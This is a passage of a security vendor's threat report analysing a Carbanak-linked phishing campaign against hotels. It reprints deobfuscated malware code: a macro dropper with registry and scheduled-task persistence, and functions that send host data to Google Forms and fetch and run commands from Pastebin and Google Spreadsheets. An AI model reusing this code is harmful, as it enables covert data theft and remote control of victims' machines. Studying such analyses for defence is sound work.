A TRUSTWAVE SPIDERLABS ADVANCED THREAT REPORT

Operation Grand Mars:

Defending Against Carbanak Cyber Attacks
 Operation Grand Mars:
Defending Against Carbanak Cyber Attacks
Author Thanassis Diogos
EMEA Managing Consultant, Incident Response, Trustwave
Contributors Sachin Deodhar
EMEA Incident Response Consultant, Trustwave
Rodel Mendrez
Security Researcher, Trustwave

Table of Contents
Executive Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1
Analysis and Findings . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3
Point of Entry . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3
Phishing email and malicious Word document . . . . . . . . . . . . . . . . . . . . . . . . . . 3
Document analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4
Embedded Script . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6
Artifacts from email attachment . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13
Starter.vbs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13
TransbaseOdbcDriver.js . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 14
LanCradDriver.vbs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 19
LanCradDriver.ini . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 19
Activity Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 20
Achieving Persistence . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 23
PowerShell Script . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 23
Registry Autorun . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 24
Task Scheduler . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 24
Lateral movement . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 25
Pass the Hash . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 25
Further malicious files . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 27
AdobeUpdateManagementTool.vbs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 27
UVZHDVlZ.exe . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 29
Update.exe . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 31
322.exe . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 34
Conclusions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 36
Remediation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 38
Tactical (short to medium term) countermeasures . . . . . . . . . . . . . . . . . . . . . . 38
Key industries be aware . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 38
Appendix A: Files . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 39
Appendix B: Malicious hosts/IP addresses . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 40
References . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 40
List of Figures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 41
List of Tables . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 42
 Operation Grand Mars: Defending Against Carbanak Cyber Attacks

Executive Summary
During September and October of 2016, the SpiderLabs team at Trustwave was consulted by several leading
organizations from the hospitality sector in Europe and the United States to analyze suspicious and potentially
malicious activity on their network including servers, point-of-sale terminals and client workstations that were spread
across different properties and locations.
The motivation of this operation appears to be financial gain, total control of the infrastructure and collection of
bots within the victim organizations. The forensics investigation and analysis indicates that these activities had
been performed by different individuals or different groups of people, leading us to conclude that several malicious
groups had cooperated in this operation with each group holding its own role and task. It soon became obvious that
we were dealing with organized crime responsible for establishing this complex system of network hosts and large
numbers of malicious files in order to perform the attacks against multiple victims.
The organizations under attack had been alerted either from their enterprise AV service that discovered pieces of
potentially malicious software or from suspicious indicators in Windows event logs. Since the victims were different
organizations the investigations were conducted by separate teams within Trustwave but intelligence sharing among
the teams proved that several similarities existed among the attacks.
The common successful entry point within all operations was an email message targeting the victim’s public-facing
services that contained a Microsoft Word document as an attachment. Once the attachment was opened multiple
malicious files were created or downloaded allowing the attackers to gain some level of access into the victim’s
infrastructure. In some cases, attackers actually called the victims over the phone, a social engineering vector, in
order to trick them into opening the attachments.
Next, several pass the hash techniques were performed to escalate privileges while persistence was achieved by
utilizing scheduled tasks and several of the operating system’s auto-start locations. Ultimately these actions allowed
the attackers to gain domain or even enterprise admin level access to the network using several resources as
Command & Control points in Europe and the US.
The attackers used cloud services such as Google Docs, Google Forms and Pastebin.com to keep track of infected
systems, spread malware and perform additional malicious activities. It is beneficial for attackers to incorporate
such services into an attacks since most enterprise networks allow access to these services and it is almost
impossible to blacklist them.
Malicious code used in these operations was split among memory resident code, scripting code (PowerShell,
JavaScript, VBS), executables (often variants of existing malware) and usage of customized versions of toolkits such
as Metasploit [1], PowerSploit [2] and Veil Framework [3].
The core tools used in these activities appear to comprise a variant of Anunak, remote backdoor, along with a Visual
Basic Script specially crafted with data exfiltration features.
Another significant finding is that some of the executables were signed using valid certificates from Comodo, a
Certification Authority. Based on the analysis of the certificates we believe that the attackers purchased and used
fake identities to bypass additional security controls.
This document describes what we believe to be a systematic criminal operation of attacks targeting the hospitality
sector in Europe and the US, at least at this time. However, the findings suggest that other sectors such as
e-commerce and retail are equally at risk and the campaign could just as easily spread to other parts of the world.

1
Copyright © 2017 Trustwave Holdings, Inc.
 Operation Grand Mars: Defending Against Carbanak Cyber Attacks

The majority of IP addresses used as Command & Control points were unknown systems located within Europe (UK,
France, Sweden etc.) indicating that attackers were trying to bypass network security controls by using seemingly
innocuous servers as malicious endpoints. During the investigation of this operation we monitored access to these
C&C servers and found that the attackers would occasionally change their C&C server and take the previous one
off-line. We believe that this alternating use of C&C servers was a purposeful action by attackers in order to remain
as stealthy as possible.
We called this operation “Grand Mars” after the name that cyber criminals used in one of the digital certificates
purchased from Comodo. While the name and Russian details (city, address etc.) used in the certificate details are
probably fake, the fact that someone actually paid for these certificates is a strong indicator that we are dealing with
organized crime activities.
This Advanced Threat Report is intended to provide an analysis of this operation and document:
• Our analysis and findings in a way that describe the nature of malicious activities, the tactics and tradecraft
utilized by the attackers, possible motives and the attribution of the threat actors behind these attacks.
• Remediation actions and advice to organizations that have already been targeted by this campaign of attacks or
willing to take proactive countermeasures.
• Indicators of Compromise (IOCs) that will benefit organizations seeking to either undertake a compromise
assessment on their own (or with the help of a team that specializes in threat hunting and compromise
assessments such as Trustwave SpiderLabs), or to proactively put in place detection mechanisms for providing
an early warning system, if and when the organization is targeted.
However, it must be noted that this Advanced Threat Report does not and is not capable of replacing formal incident
response actions and procedures that must be undertaken to mitigate the threat and restore business functions as
per the Organizational Incident Response/Disaster Recovery roadmap. 

2
Copyright © 2017 Trustwave Holdings, Inc.
 Operation Grand Mars: Defending Against Carbanak Cyber Attacks

Analysis and Findings

POINT OF ENTRY
The first objective of the investigation was to identify the precise entry point of the attackers into the network and
the method of initial compromise exercised.

Phishing email and malicious Word document

The numerous investigations conducted globally by the Trustwave SpiderLabs team identified a common event at
the beginning of the timeline of these attacks–that one or more employees had received what appeared to be, prima
facie, a targeted phishing email with a potentially malicious Word document attachment.

Figure 1. E
 mail received by victim with a Word attachment

Good day, we would like to book rooms for our employees. 12 people will arrive in Paris on November 24.
Room types attached with this email, as well as the names of employees. If you have a room available, we
will make a deposit. Waiting for you reply

Figure 2. M
 essage body of the suspect email

While the content of message appears to be legitimate and is related to the organization’s services (hospitality
sector) the email contained a Microsoft Word document attachment (.docx) – as seen in the screenshot below, 1-list.
docx is the name of the document attached.

Figure 3. M
 icrosoft Word .docx attachment (1-list.docx)

The malware authors called the victim directly via phone and asked for the attachment to be opened to ensure
infection, since the default setting in Microsoft Word prevents execution of any macro code. This was the social
engineering element of the attack vector used to convince the user to execute the macro by double clicking an
image shown inside the opened document.

3
Copyright © 2017 Trustwave Holdings, Inc.
 Operation Grand Mars: Defending Against Carbanak Cyber Attacks

Document analysis
A detailed examination of the attached Word document proves that this was the vector used by the attackers to
gain entry into the targeted organization’s network. The 1-list.docx file appears to be a Macro-Enabled malware,
designed to drop and execute malicious code on the target system.

Figure 4. W
 ord .docx Macro enabled malware

The latest office format [4] (.docx, .xlsx etc.) is actually a compressed XML-based file format developed by Microsoft
which can be extracted as normal compressed files. After uncompressing the contents of the Word document an
embedded OLE object (oleObject1.bin) was revealed.

Figure 5. E
 mbedded oleObject0.bin file from Word document

4
Copyright © 2017 Trustwave Holdings, Inc.
 Operation Grand Mars: Defending Against Carbanak Cyber Attacks

Inside the contents of the oleObject1.bin, there are indicators of a macro code (unprotected.vbe) embedded in the
document, which seem to be encoded.

Figure 6. o
 leObject.bin showing potentially encoded content

Figure 7. U
 se of legitimate tool to encrypt/encode VBE script 5
Copyright © 2017 Trustwave Holdings, Inc.
 Operation Grand Mars: Defending Against Carbanak Cyber Attacks

The strings seen in the screenshot above from oleObject1.bin indicate that the attackers have used an evaluation
version of a commercially available script encoding/encryption tool called “Scripts Encryptor” [5].

Figure 8. T
 ool used for obfuscating the VBE script

Embedded Script
After manually decoding the contents of oleObject1.bin the result was a VBScript, as expected. The script contains
several functions, a subset of them used for transforming data from custom variables embedded in the body of the
script using techniques such as “BinaryToStRinG, StringTOBinary” and “Base64DecodE, base64ENcode”.

6
Copyright © 2017 Trustwave Holdings, Inc.
 Operation Grand Mars: Defending Against Carbanak Cyber Attacks

FunctiON strEaM_BinaryToStRinG(BinaRy)
On ErrOr ReSume NeXt
CoNSt aDTypEText=2
Const ADTyPebiNAry=1
Dim BinArySTream
Set BinaRYStream=CReateObject(“ADODB.Stream”)
BInaryStrEaM.TyPe=adTypEBinarY
BinarYStReaM.OpEn
BinaRyStReam.Write binary
BInaryStream.PosiTion=0
bInAryStream.TyPe=aDtypeText
Binarystream.chArSeT=”utf-8”
Stream_BinaryToStrIng=BinaryStream.ReadText
SeT BinaryStream=Nothing
End function
fuNctIon StReam_StringTOBinary(TeXt)
On ERRor Resume Next
CoNst AdTypeText=2
Const adTypeBinary=1
Dim BinaryStream
Set BinaryStreAm=CreateObject(“ADODB.Stream”)
BinaryStream.type=adtypeTExT
BinaRyStream.charSet=”utf-8”
BinarystreAm.Open
binarystrEam.writeText TExt
BinarYstream.Position=0
BinaryStReam.Type=adTypebinary
binaRyStream.Position=0
Stream_STringTOBinarY=Binarystream.ReaD
SeT BINAryStream=Nothing
End Function

Figure 9. B
 inary to String conversion functions

Function Base64DecodE(byVal vCODe)

On Error Resume Next
Dim oxMl,ONOde
SEt oXML=CreaTeObjEcT(“Msxml2.DOMDocument.3.0”)
SeT oNode=oxML.CreateEleMent(“base64”)
oNodE.dAtaType=”bin.base64”
oNOde.text=vCode
Base64decode=Stream_BINaryToString(oNoDe.nodetypedVALUe)
Set oNode=NothinG
SEt oXML=Nothing
End Function
FunctioN base64ENcode(sText)
On Error resume next
Dim oXML,oNode
sEt oXMl=CreatEObJECT(“Msxml2.DOMDocument.3.0”)
SeT oNode=oXmL.creAteElement(“base64”)
oNode.daTaType=”bin.base64”
oNode.nodeTypedvalue=STreAm_StrinGToBinaRy(sTExT)
BaSe64encode=oNode.tExt
Set onode=NothinG
SeT oxML=NothIng
End FunCtion

Figure 10. B
 ase64 encode-decode functions

What seems to be one of the main usages of the embedded script is the creation of several other files on the infected
system using the functions listed earlier. The new files were written by converting data stored in a variable named “f”.
7
Copyright © 2017 Trustwave Holdings, Inc.
 Operation Grand Mars: Defending Against Carbanak Cyber Attacks

suB ggL_StartER(pth)
ON ErROR rESume Next
DIm f
f=”T24gRXJyb3IgUmVzdW1lIE5leHQNCkRpbSBvYmpTaGVsbCxwYXRoDQpTZXQgb2JqU2hlbGwgPSBX”
.
… … … … (truncated) … … … … …
.
f=f&”IlxUcmFuc2Jhc2VPZGJjRHJpdmVyLmpzIg0KcGF0aCA9ICJjbWQuZXhlIC9rIHdzY3JpcHQuZXhl”
f=f&”ICIiIiAmIHBhdGggJiAiIiIiDQpvYmpTaGVsbC5SdW4gcGF0aCwgMCwgdHJ1ZSANClNldCBvYmpT”
f=f&”aGVsbCA9IE5vdGhpbmc=”
Set Sh=CReAteObjECt(“WScript.Shell”)
DiM woRkpath,stAtmkDiR
WorkPath=pth
staTMkDIr=CreatEDIr(workpatH)
IF statMkDir Then sEt oBjFSO=CreateObjecT(“Scripting.FileSystemObject”)
outFile=wOrkPath&”\starter.vbs”
Set oBjFiLe=objfSO.CreATeTextfile(outFile,TRue)
oBjFile.WriTe BAse64DEcode(f)
objFile.CLosE
End If
End sub

Figure 11. S
 tarter.vbs creation (truncated)

The above section of the code will create the starter.vbs file in the user’s Temp folder.

SuB folderIniT(pth)
on ErRor Resume Next
Set Sh=CreateOBject(“WScript.Shell”)
Dim WoRkPaTh,statMKDir
WorkPath=pth
statmKDir=CreateDir(woRkPath)
IF STaTMkDiR tHEn SeT oBjFSO=CReatEOBJEct(“Scripting.FileSystemObject”)
outFILe=WOrkPath&”\LanCradDriver.ini”
Set objFile=objFSO.CrEateTextFiLe(outFile,TruE)
oBjFile.cLosE
End If
End SuB
seT sh=CreateObJecT(“WScript.Shell”)
Dim Workpath,statMKDir
WOrkpath=PtH
StatMkDir=CreAteDiR(WorkPaTh)
if sTatMkDir Then SEt ObjFSO=CreateObject(“Scripting.FileSystemObject”)
oUtFile=WorkPath&”\LanCradDriver.vbs”
Set objFIle=objfsO.CReaTetextFile(oUtFIle,TRue)
objFile.Write Base64DeCodE(f)
objFile.Close
End If
End SuB

Figure 12. L
 anCradDriver.vbs LanCradDriver.ini creation

Similarly, the code above will create the LanCradDriver.vbs and an empty LanCradDriver.ini file in the User’s Temp
folder. The role of LanCradDriver.ini will be explained in a later section.

8
Copyright © 2017 Trustwave Holdings, Inc.
 Operation Grand Mars: Defending Against Carbanak Cyber Attacks

f=”dmFyIG9ialNXYmVtU2VydmljZXNFeCA9IEdldE9iamVjdCgid2lubWdtdHM6e2ltcGVyc29uYXR”
.
. … … … … (truncated) … … … … …
.
F=f&”dpYWMrIi4iK3Jlc3VsdDsNCglyZXR1cm4gCXJlc3VsdDsNCn0NCg0KZnVuY3Rpb24gU2hvd1Bhc”
f=f&”mVudEZvbGRlck5hbWUoZmlsZXNwZWMpDQp7DQogICB2YXIgZnNvLCBzID0gIiI7DQogICBmc28g”
f=f&”PSBuZXcgQWN0aXZlWE9iamVjdCgiU2NyaXB0aW5nLkZpbGVTeXN0ZW1PYmplY3QiKTsNCiAgIHM”
f=f&”gKz0gZnNvLkdldFBhcmVudEZvbGRlck5hbWUoZmlsZXNwZWMpOw0KICAgcmV0dXJuKHMpOw0KfQ”
f=f&”==”
Set sh=CreateObjeCT(“WScript.Shell”)
Dim WorkPath,statMkdir
WorkPath=pth
statmkDir=CReatEDir(WorkPAth)
if statMkDiR then SEt oBJFSO=CReateObJecT(“Scripting.FileSystemObject”)
oUtfIle=WorkPaTh&”\TransbaseOdbcDriver.js”
Set objfile=objFSO.CreateTextFile(outFile,true)
objFile.Write BaSE64DecOde(f)
objFiLe.ClOse
sh.RuN”wscript “””& oUtFile&””””,0,False
End If
End Sub

Figure 13. T
 ransbaseOdbcDrive.js creation (truncated)

The last file created named TransbaseOdbcDriver.js fileis executed using wscript.exe under a hidden command shell.

Set sh=CrEateObject(“WScript.Shell”)
dim WsCript_pthpath
wscriPt_pthpath=sh.ExpandEnvironMentStrings(“%WINDIR%”)+”\System32\WScript.exe”
DIm run_ptH_scr
rUN_pth_scr=pTh+”\starter.vbs”
dim run_pTh
run_pth=””””&wscript_Pthpath&””” “””&run_ptH_scR&””””
sh.RegWRite”HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run/TransbaseOdbcDriver”,
run_pth,”REG_SZ”
sh.run”schtasks /create /tn “”SysChecks”” /tr “””&run_PTh&””” /sc minute /mo 30”,0,FAlse
End sub

Figure 14. P
 ersistence of starter.vbs

In addition to the files created, the embedded script (oleObject1.bin) adds a registry key for persistence, which
comprises a scheduled task to call starter.vbs periodically (every 30 min) and finally executes starter.vbs.
Another interesting function computes a unique CUID using the system’s hard drive serial number. Utilizing this
function points to the fact that attackers seek a unique identifier from each infected system. The output of the
function is Base64 encoded and stored as “cuid” which is used later on in the operation.

9
Copyright © 2017 Trustwave Holdings, Inc.
 Operation Grand Mars: Defending Against Carbanak Cyber Attacks

FUnction cuid()
On errOr Resume next
Dim Giac
giac=”4”
dim uuid
uuid=”1”
Dim FSO,D,serial
Set FSO=CrEATeobjecT(“Scripting.FileSystemObject”)
sTrDrive=fsO.GetDrivEname(fSo.GetSpEcIalFolDer(0))
seT D=FsO.GEtDrive(strDrive)
Serial=D.SeriAlNumber
DiM Result
ResulT=BAse64Encode(“”&SeriaL)
rEsult=MId(cleArStr(rESult),1,20)
cuiD=uuid&”.”&giac&”.”&result
enD Function

Figure 15. C
 alculating and encoding of Disk S/N

Internet activity also indicated a function that checks for proxy settings on the infected system, an indicator of
suspicious internet activity as part of this operation and will be explained later in this document.

ProxyEnaBlE=objshelL.RegREad(“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet
Settings\ProxyEnable”)
if ProxyEnable=”1”TheN
ProxySeRver=objshell.RegREad(“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet
Settings\ProxyServer”)
getPRoxy=ProxySeRVEr
Else GEtProxy=””
end if

Figure 16. C
 hecking proxy configuration

MaIn()
On ErroR ResumE nEXt
Dim Txt
txt=cuid()
txt=tXt&” | “&GetUseRData()
txt=tXt&” | “&Iswin32Orwin64()
tXt=txt&” | “&GetOS()
dim REs
res=sendFormData(tXt)
Dim Fso,currDir,currDirPlus
Set fso=CreateOBjecT(“Scripting.FileSystemObject”)
currdiR=fso.GEtParEntFolderNaMe(Wscript.ScriptFullNAMe)
currDirPlus=currdiR&”\TransbaseOdbcDriver”
foldeRInIt currDiRPlus
ggL_rUner currDirplus
gGl_STarter cUrrDIrPluS
Ggl_hex currDirPlus
SetREgDatA currdirPlus
abraCadabra
End Sub
Main

Figure 17. M
 ain function

10
Copyright © 2017 Trustwave Holdings, Inc.
 Operation Grand Mars: Defending Against Carbanak Cyber Attacks

The “Main” function takes care of the last bits during this first stage of the operation. Initially it calls cuid(),
computing disk s/n as we’ve seen earlier and then some other helper functions. These gather user data such as
username, computer name/domain (GetUseRData), check OS architecture (Iswin32Orwin64) and get OS version
(GetOS). All of this data is stored in the variable “txt” and then another function called sendFormData” is used to
handle them.

FunctIon sendFormDaTa(Value)
On ErrOR resume next
Dim foRmkey
formkeY=”e/1FAIpQLSfsumC-aXeUevDfI852NkJN4- ”
DiM enTry
entry=”entry.1269488164”
Dim rc
Dim HttpRequest
On ErrOR ReSuMe next
Set HtTpRequest=CreateobJect(“Msxml2.ServerXMLHTTP.6.0”)
If Err.NumbEr<>0 tHen sendFormDatA=falSe
Set httPReQuEst=Nothing
Exit FuNCtion
end If
dim PRoX
Prox=gETProxy
HttpRequest.OPen”POST”,”https://docs.google.com/forms/d/”&fOrMkeY&”/formResponse”,FalSe
if prox<>””thEn HttpreQueSt.setProxy 2,prox,””
End iF
HTtpRequesT.sEtRequeStHEadeR”Content-Type”,”application/x-www-form-urlencoded”
On Error Resume Next
HttpRequeSt.Send(entry&”=”&ValuE)
If HttpRequest.rEadystate<>4 Then httpRequEst.WaitForRespOnse 30
End If
rc=httpRequest.StatusText
If ERr.Number<>0 THeN sendFormData=False
eXit FUnction
End If
If Rc=”OK”THen sendformData=True
ElSe senDFormData=FaLse
EnD If
SeT httprequeSt=Nothing
End Function

Figure 18. s endFormData function

The function shown above is used to connect and submit data using Google Forms. At this stage the information
gathered before (user data, disk s/n etc.) will be collected by the malware operators using the Google Form
displayed below.

11
Copyright © 2017 Trustwave Holdings, Inc.
 Operation Grand Mars: Defending Against Carbanak Cyber Attacks

Figure 19. Initial submission Google Form

The name of the form “formFirstPingBotList” is self-explanatory, collecting initial information from victims. Usage of
such services is always beneficiary for attackers since they usually have unrestricted accessin most networks.
 

12
Copyright © 2017 Trustwave Holdings, Inc.
 Operation Grand Mars: Defending Against Carbanak Cyber Attacks

ARTIFACTS FROM EMAIL ATTACHMENT

As we’ve seen, opening the Word document executes the embedded script and drops the following four files:

Figure 20. F
 iles dropped on execution of embedded VBE script

Note in the screenshot above, that the LanCradDriver.ini file is a zero-byte file (empty). It is merely “touched”
but not yet populated. As you will see further in this analysis, the file is subsequently populated after the
TransbaseOdbcDriver.js script has executed.

Starter.vbs
This is a VBScript file, which as shown earlier, uses registry Autorun and Task Scheduler to achieve persistence and
executes the actual payload.

Hash Type Value

MD5 E63F45968AE3E534D6A4AFE891830541
SHA-1 ECD5293A7FE1CDF262ED921620D80353CDED5DD0
SHA256 270A776CB9855F27452B35F072AFFBBC65023D4BB1F22E0C301AFD2276E7C5EA
SSDeep 12:9vWd+vqfaHHI7kVLkqhBvKIIXURun+cPqrC:9A+vqfaHHI78LD/KILun+0qrC

Table 1. H
 ashes of Starter.vbs

This is responsible for execution of the TransbaseOdbcDriver.js using wscript.exe within a hidden command prompt.

On Error Resume Next

Dim objShell,path
Set objShell = WScript.CreateObject( “WScript.Shell” )
Dim fso, currDir, currDirPlus
Set fso = CreateObject(“Scripting.FileSystemObject”)
currDir = fso.GetParentFolderName(Wscript.ScriptFullName)
currDirPlus = currDir
path = currDirPlus & “\TransbaseOdbcDriver.js”
path = “cmd.exe /k wscript.exe “”” & path & “”””
objShell.Run path, 0, true
Set objShell = Nothing

Figure 21. S
 tarter.vbs script

13
Copyright © 2017 Trustwave Holdings, Inc.
 Operation Grand Mars: Defending Against Carbanak Cyber Attacks

The following screenshot displays starter.vbs being started by Task Scheduler. Starter.vbs in turn calls and executes
TransbaseOdbcDriver.js, which is the core element in this stage of the attack.

Figure 22. P
 rocess information for TransbaseOdbcDriver.js

TransbaseOdbcDriver.js
This script includes several functions but we will focus on its main operation.

Hash Type Value

MD5 4EC7088AAC32C94A7046810925BC1697
SHA-1 7B46BB249485B36C318D53FA070D945EA8DBF606
SHA256 313E38756B80755078855FE0F1FFEA2EA0D47DFFFCBE2D687AAA8BDB37C892F4
SSDeep 384:MuVpmKuHXtRY8DmPF86QIWL0z9T6l+aBUBiigzxPs2hRhi:UKgHRmPF86JW4z9T6lBUIiAPhfi

Table 2. H
 ashes of TransbaseOdbcDriver.js

Upon execution it calls LoadLinkSettings() function which connects to Google Spreadsheet executing a Macro
based on the unique disk serial number (guid) as seen earlier in the document.

function LoadLinkSettings() {
var go_com = InetRead(“https://script.google.com/macros/s/AKfycbyHCvQKeEwmgQqB661-
aUV_ /exec”+ “?bid=” + guid);
try {
if( go_com[‘stat’] >= 200 && go_com[‘stat’] < 300){
var cmd_txt = go_com[‘text’];
var settingsArr = cmd_txt.match(
/,\\x22userHtml\\x22:\\x22(.+)\\x22,\\x22ncc/ );
var setting = split(settingsArr[1],’$$$’,3);
if (setting.length == 3) {
return {
“spreadsheetkey”: setting[0]
,”formkey”: setting[1]
,”entry”: setting[2]
};
}
var formkeyReg = “e/1FAIpQLScbMcfvLYkqA369ISWkWovJ_4ZkIc0nFdM4Ec_
Cv95PAAnllQ”;
var entryReg = “entry.960420097”;
LogInet(guid,formkeyReg,entryReg);
}

Figure 23. L
 oadLinkSettings() function

The output of the macro code is then sliced ($$$) retrieving three important pieces of data used in the next steps of
the operation:
1. SpreadSheetKey
2. FormKey
3. Entry

14
Copyright © 2017 Trustwave Holdings, Inc.
 Operation Grand Mars: Defending Against Carbanak Cyber Attacks

Figure 24. G
 oogle macro execution output

It then calls LogInet() using these arguments and submits an entry of a new Bot/infected system using Google
Forms. The connection to Google Forms uses an Android HTC Pyramid model (Chinese – Taiwan language) User-
agent string.

function LogInet(value,formkey,entry) {
try {
var httpReq = new ActiveXObject(“Msxml2.ServerXMLHTTP.6.0”);
httpReq.setOption(2, 13056);
httpReq.setTimeouts(0, 0, 0, 0);
url = “https://docs.google.com/forms/d/” + formkey + “/formResponse”;
httpReq.open(“POST”, url, false);
var prox = getProxy()
if( prox != “”){
httpReq.setProxy(2, prox, “”);
}
httpReq.setRequestHeader(“User-agent”, “Mozilla/5.0 (Linux; U; Android 2.3.3; zh-tw; HTC
Pyramid Build/GRI40) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1”);
httpReq.setRequestHeader(“Content-Type”, “application/x-www-form-urlencoded”);
httpReq.send(entry + “=” + value);
} catch (e) {}
}

Figure 25. L
 ogInet() function

15
Figure 26. Infected system registration using Google Form
Copyright © 2017 Trustwave Holdings, Inc.
 Operation Grand Mars: Defending Against Carbanak Cyber Attacks

After successfully initializing, the script calls GetSourceCode() in an indefinite loop of 1 or 2 min intervals.

do {
if ( setttingArr ) {
GetSourceCode(setttingArr.spreadsheetkey, setttingArr.formkey, setttingArr.entry);
}else{
setttingArr = LoadLinkSettings();
}
WScript.Sleep(1000*60*randInt(1,2));
}

Figure 27. C
 alling GetSourceCode() function

GetSourceCode() function fetches data from Pastebin and stores it in a new file named dttsg.txt. Finally executes
GetCommand().

function GetSourceCode(aspreadsheetkey,aformkey,aentry) {
var GlobalObject = this;
var FSO = new ActiveXObject(“Scripting.FileSystemObject”);
var WshShell = new ActiveXObject(“WScript.Shell”);
var formkey = aformkey;
var entry = aentry;
var spreadsheetkey = aspreadsheetkey;
var botclass = GenerateString(8);
var last = TextFileRead( GLBFolderPlus + “\\dttsg.txt” );
var version = “1.0”;
var linkPB = “http://pastebin.com/raw/MfQV5e6R”;
var keyPath = “HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\
lasts”;
WshShell.CurrentDirectory = GLBFolderPlus;
Log();
GetCommand();

Figure 28. G
 etSourceCode function

File dttsg.txt has the following structure and is split into two sections “last” and “code” and provides another covert
channel during this operation.

{last: “abc123”, code: “ZGltIHh4eA==”}

Figure 29. C
 ode from Pastebin

Data from section “last” is written into registry perhaps to keep track of last executed command and “code” which
is Base64 encoded used as an argument and allows attackers to execute one of the following commands “Destroy”,
“GetCompInfo”, “GetProcList” and “RunCMDLine”, as displayed below. However, usage of this feature was not
observed during our investigation.

16
Copyright © 2017 Trustwave Holdings, Inc.
 Operation Grand Mars: Defending Against Carbanak Cyber Attacks

var cod_data = Base64.decode(cmb_ob.c);

if(cod_data == “#deleteBot#”){
destroy();
}else if(cod_data == “#GetCompInfo#”){
Log(“$stdOut$” + GetComputerInform());
}else if(cod_data == “#GetProcList#”){
Log(“$stdOut$” + GetCompProcess());

}else if( cod_data.indexOf(“#RunCMDLine#”) !== -1){
var cmd_str = split(cod_data,’#RunCMDLine#’,2);
Log(“$stdOut$” + RunCMDLine(cmd_str[1]));
}else{
var tempname1 = “LanCradDriver.ini”;
var tempname2 = “LanCradDriver.vbs”;
var tmpPath = GLBFolderPlus;
var tempath1 = tmpPath + “\\”+tempname1;
var tempath2 = tmpPath + “\\”+tempname2;

var f = FSO.OpenTextFile(tempath1,2,false,-1);
f.Write(cod_data);
f.Close();

Figure 30. A
 rguments from Pastebin

Figure 31. P
 astebin account used for tracking

Continuing into the execution of GetCommand() it connects again to Google Docs, using the spreadsheet key
obtained in the output of the LoadLinkSettings() and saves the data into the LanCradDriver.ini file. The latter file was
initially created as an empty file and now it becomes another key component during the operation.

17
Copyright © 2017 Trustwave Holdings, Inc.
 Operation Grand Mars: Defending Against Carbanak Cyber Attacks

function GetCommand() {
try {
var legc = getLastExeGoogCmd();
var cmb_ob = {}
cmb_ob.flag = false;
var go_com = InetRead(“https://docs.google.com/spreadsheet/ccc?key=” +
spreadsheetkey);
if( go_com[‘stat’] >= 200 && go_com[‘stat’] < 300){
var cmd_txt = HTMLParse(go_com[‘text’]).document.documentElement.innerText;
var command = split(cmd_txt,’$$$’,3);
if (command.length == 4) {
cmb_ob.c = command[2];
cmb_ob.l = command[1];
cmb_ob.flag = true;
.
.
.

var tempname1 = “LanCradDriver.ini”;

var tempname2 = “LanCradDriver.vbs”;
var tmpPath = GLBFolderPlus;
var tempath1 = tmpPath + “\\”+tempname1;
var tempath2 = tmpPath + “\\”+tempname2;

var f = FSO.OpenTextFile(tempath1,2,false,-1);
f.Write(cod_data);
f.Close();

WScript.Sleep(5000);
WshShell.Run(‘wscript.exe “’ + tempath2 + ‘”’,0,false);

}
}

Figure 32. D
 ownloading code from Google Docs (truncated)

The actual data which is Base64 encoded as seen in the Google spreadsheet is then decoded and stored in the
LanCradDriver.ini file.

Figure 33. E
 ncoded PowerShell commands retrieved from Google Spreadsheet

Contents of the new file, LanCradDriver.ini, reveal that it is actually a VBScript executing a PowerShell script. As a
